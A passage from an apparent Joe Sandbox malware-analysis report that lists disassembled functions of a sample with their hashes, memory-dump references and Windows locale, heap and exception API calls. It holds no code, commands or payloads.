Opcode ID: a1ddd08147fd36ea3617689208726f78d27afcb9fe87ee02423122810109f4cc
Instruction ID: e4bc5da32766628875e319fa45a5b109b5c58405b0fdf67a3565aee73107048f
Opcode Fuzzy Hash: a1ddd08147fd36ea3617689208726f78d27afcb9fe87ee02423122810109f4cc
Instruction Fuzzy Hash: 4D31E47A900219AFDB24DFA9CCC8EAFB77DEB84311F144258FC1597244EA309E848B54

Function 00C4E182 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00C4E310

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 10c0c5468f290e3e062240562a341ee88b4818b5ef0ec81ba17c98837c7eddf2
Instruction ID: b8f7bec2b99c9a1270aa9e95d23b6884cd7b2e850eeebb03cf100a471bccbbf9
Opcode Fuzzy Hash: 10c0c5468f290e3e062240562a341ee88b4818b5ef0ec81ba17c98837c7eddf2
Instruction Fuzzy Hash: 37C1F37090064A8FCB39CF68C484A7EBBB6BF05314F16461DE466976A2C770EE45CB51

Function 00C5EC03 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00C56984: GetLastError.KERNEL32(?,?,00C51794,?,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?), ref: 00C56988
Part of subcall function 00C56984: SetLastError.KERNEL32(00000000,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?,?,?), ref: 00C56A2A

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C5EC57

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 15666d6965ad58f3a50701e8c9619c5e9a31b134f53f2ed9d5fe28d965c0a0c4
Instruction ID: 6ebdf8c338c0dd3e339f493427f4a3fd521bfd1eed7bb65f1dc4ae05f1d5b9a4
Opcode Fuzzy Hash: 15666d6965ad58f3a50701e8c9619c5e9a31b134f53f2ed9d5fe28d965c0a0c4
Instruction Fuzzy Hash: 5321C576614206ABDF2CAF25DC41A7A77ACEF05306B10407AFD11D7181EB74EE88DB54

Function 00C5E88A Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C56984: GetLastError.KERNEL32(?,?,00C51794,?,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?), ref: 00C56988
Part of subcall function 00C56984: SetLastError.KERNEL32(00000000,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?,?,?), ref: 00C56A2A

EnumSystemLocalesW.KERNEL32(00C5E9B0,00000001,00000000,?,-00000050,?,00C5EFE1,00000000,?,?,?,00000055,?), ref: 00C5E8FC

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: b9398278ae0835451fa147395230fdce6ca6479e786b094030628259024675f6
Instruction ID: 23c5a20624ed33c31f09970b5893990a5c47bafe39793756858c58f12fa548b5
Opcode Fuzzy Hash: b9398278ae0835451fa147395230fdce6ca6479e786b094030628259024675f6
Instruction Fuzzy Hash: 2911C63A2047019FDB1C9F39C8916BAB791FF80369B14852DED9687740D7717A86C744

Function 00C5EE32 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00C56984: GetLastError.KERNEL32(?,?,00C51794,?,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?), ref: 00C56988
Part of subcall function 00C56984: SetLastError.KERNEL32(00000000,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?,?,?), ref: 00C56A2A

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00C5EBCC,00000000,00000000,?), ref: 00C5EE5E

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 838786afde307af04551bb9ad5c9dae5357f5eecf59c66d62c20efb0ed081fd5
Instruction ID: 8f773bbd6f67314dce481ad1fed1e236a00bc54b842a3dd85975495a6e480180
Opcode Fuzzy Hash: 838786afde307af04551bb9ad5c9dae5357f5eecf59c66d62c20efb0ed081fd5
Instruction Fuzzy Hash: B3F0F93AA20511BBDB2C5B218C077BA7BA4EF40755F050424EC55E3140DAB4FF89C694

Function 00C5E925 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C56984: GetLastError.KERNEL32(?,?,00C51794,?,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?), ref: 00C56988
Part of subcall function 00C56984: SetLastError.KERNEL32(00000000,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?,?,?), ref: 00C56A2A

EnumSystemLocalesW.KERNEL32(00C5EC03,00000001,?,?,-00000050,?,00C5EFA5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00C5E96F

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: e9c58a82000c84d99bb82e419d13b94e86f27b8119977cd5504823c8761d6bb9
Instruction ID: db53cdefa6e464b12cdcb2042ce4a25aa257549255628479d0f7ec71ee6ccf6b
Opcode Fuzzy Hash: e9c58a82000c84d99bb82e419d13b94e86f27b8119977cd5504823c8761d6bb9
Instruction Fuzzy Hash: D9F08B3A3043045FCB289F39DC81BBABB91EF80369F08442DFD414B690D2B1AE86C754

Function 00C57852 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C4F057: EnterCriticalSection.KERNEL32(?,?,00C5665C,?,00C6D6B8,00000008,00C56820,?,00C4DAD6,?), ref: 00C4F066

EnumSystemLocalesW.KERNEL32(00C57845,00000001,00C6D778,0000000C,00C57BF8,00000000), ref: 00C5788A

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: d26eba5135df97ecd6370b8a2ad44f5ed862824dbb6db43289b154cc845b8efa
Instruction ID: 1e47107364f3bf708ef38ca5c736f90973ccc0299bb4151c05564a392f8b7b32
Opcode Fuzzy Hash: d26eba5135df97ecd6370b8a2ad44f5ed862824dbb6db43289b154cc845b8efa
Instruction Fuzzy Hash: 91F04976A44214EFD710DF98E842B9E77F0FB48721F00422AF911AB2E1C7B58945DF44

Function 00C5E83F Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C56984: GetLastError.KERNEL32(?,?,00C51794,?,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?), ref: 00C56988
Part of subcall function 00C56984: SetLastError.KERNEL32(00000000,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?,?,?), ref: 00C56A2A

EnumSystemLocalesW.KERNEL32(00C5E798,00000001,?,?,?,00C5F003,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C5E876

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 34087d28396bb4bb394984cc19e2fdedf09159b5568abe608f67cb05a5f7de5e
Instruction ID: c4584953ae513a14d7b645dd262251805cc23743bb7a60846e3694a5d30d4d53
Opcode Fuzzy Hash: 34087d28396bb4bb394984cc19e2fdedf09159b5568abe608f67cb05a5f7de5e
Instruction Fuzzy Hash: B8F0553E30020597CB1C9F39DC0576ABF94EFC1725B064059EE058B280C6719A86C794

Function 00C57CFC Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C53EAB,?,20001004,00000000,00000002,?,?,00C534AD), ref: 00C57D30

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 5d2874d6ea6c8d1ed308727dc6652f46034eefd80fc5d946b8694c8a1c5121ef
Instruction ID: 98fff16fd25319cd3db322bc8a351b29bb7c0a73c0201a39de943a441e3d9dfa
Opcode Fuzzy Hash: 5d2874d6ea6c8d1ed308727dc6652f46034eefd80fc5d946b8694c8a1c5121ef
Instruction Fuzzy Hash: 44E04835504218BBCF222F62FC05FAE3E26EF45752F044111FD0565120C7718DA1A6D4

Function 00C49148 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009154,00C4846A), ref: 00C4914D

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9c3e1d27a7c8ff596718c768b76900bc6d6375f7d4f44f9f10921e6e6232165b
Instruction ID: f26f3b96ede2a0128319ef3f340134b436d6059ac155a921f95012a102e8ec70
Opcode Fuzzy Hash: 9c3e1d27a7c8ff596718c768b76900bc6d6375f7d4f44f9f10921e6e6232165b
Instruction Fuzzy Hash:

Function 00C41E74 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Z81xbyuAua, xrefs: 00C41F96

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: Z81xbyuAua
API String ID: 0-3121583705
Opcode ID: e51f50ea32bc66950f69e0fdf43e8ddb64eff349e0888865b56122e3defdeb75
Instruction ID: 12f5a628f472c558ab37cc088391fbfb77abe485e599e081e9c4ef4ed8053dcd
Opcode Fuzzy Hash: e51f50ea32bc66950f69e0fdf43e8ddb64eff349e0888865b56122e3defdeb75
Instruction Fuzzy Hash: 01410B76D2052B4BDB0CEEB8C4461AFBBA5E756360B04427ADD61DB3D1E2309B46C6D0

Function 00C5F163 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00C5F163

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 1b989644e74b53095c5e48ffa4b072183e94f68e6c00b6b799da91d5c4d198d2
Instruction ID: e2b04e7ff6c45187a39758f4372e68a1f2a43693f4fd01d45087850ac9524c23
Opcode Fuzzy Hash: 1b989644e74b53095c5e48ffa4b072183e94f68e6c00b6b799da91d5c4d198d2
Instruction Fuzzy Hash: 06A011302022008B8B008F32BA0830E3AA8AA2A2C230A802AE800C2030EA2080808F00

Function 00C9CD9B Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 38e64c41ef0c42d47275ef9eaba71ba5a051e134d580d00d514db949a568abac
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 7DC15073D0A9B2098F36466E449C23EFF626F91B4131FC395DCE03F689C626AE1695D0

Function 00C9C9B3 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 22b2218750a6e410d9c2ace8958767c089910f9084eae33b17cf464de15b4ca5
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 44C16F73D0A9B2058F35866D449C23EFF626F91B4131FC395DCE03F689C626AE0696D0

Function 00C9C5E1 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 0dd1111480c18ec13904b67db5f2c1a9c52d11b1762eada2a2fcd904b2c496eb
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: C4C17173D0A9B2458F3646AE459C23EFF616F81F4031F8395DCE03F689C626AE1696D0

Function 00C5E04E Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: 546ab319ccc4752b38c74e54b3e85639f90f62459dafdcfdafd98caaaadde23e
Instruction ID: b596fdc10bb78480ad5af7aad88ea5fac1e7ccea354e6678dbf23b36fe812e77
Opcode Fuzzy Hash: 546ab319ccc4752b38c74e54b3e85639f90f62459dafdcfdafd98caaaadde23e
Instruction Fuzzy Hash: F7B126396007019BCB3C9F25CC82BBBB3A8EF44309F14452DED92C6595EA75ABC9DB04

Function 00C9C243 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 4699cf58f87674a18ec7374aa022d7faf4193f70bd15a7eabd1ba0c46efa7621
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 74B16073D0A9B2058F75466D449C23BEFA26F91B4131FC395DCF03F689C626AE0696D0

Function 00C426C3 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2319ef31f7c2203eca4114fcdf52f774ec9022336b200e2d48b43c5822689de
Instruction ID: 66ce6858e7daa53b9d267329236a4514ae40fd093680f468f44926cc83418782
Opcode Fuzzy Hash: c2319ef31f7c2203eca4114fcdf52f774ec9022336b200e2d48b43c5822689de
Instruction Fuzzy Hash: DC71AD1BA2491B05E31C203A99533F1D84EF7F6370ED66333BE668B7F4E65E0946A148

Function 00C8A793 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
Instruction ID: b6d693743d40da2e16dbaa088fd38a94c7db2f52ea3ab289d3a759b45717e38a
